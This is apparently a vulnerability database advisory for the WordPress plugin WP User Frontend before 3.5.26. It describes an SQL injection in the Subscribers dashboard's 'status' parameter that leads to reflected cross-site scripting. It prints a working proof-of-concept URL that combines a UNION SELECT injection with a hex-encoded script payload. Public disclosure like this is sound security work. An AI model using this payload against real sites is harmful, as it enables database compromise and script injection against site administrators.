WordPress Plugin Vulnerabilities

WP User Frontend < 3.5.26 - SQL Injection to Reflected Cross-Site Scripting

Description

The plugin does not validate and escape the status parameter before using it in a SQL statement in the Subscribers dashboard, leading to an SQL injection. Due to the lack of sanitisation and escaping, this could also lead to Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin.php?page=wpuf_subscribers&post_ID=1&status=%22+union+select+1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C0x3c696d6720737263206f6e6572726f723d616c6572742831293e+--+g

Affects Plugins

Fixed in 3.5.26

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes

Timeline

Publicly Published
2021-12-27 (about 2 years ago)
Added
2021-12-27 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)

Other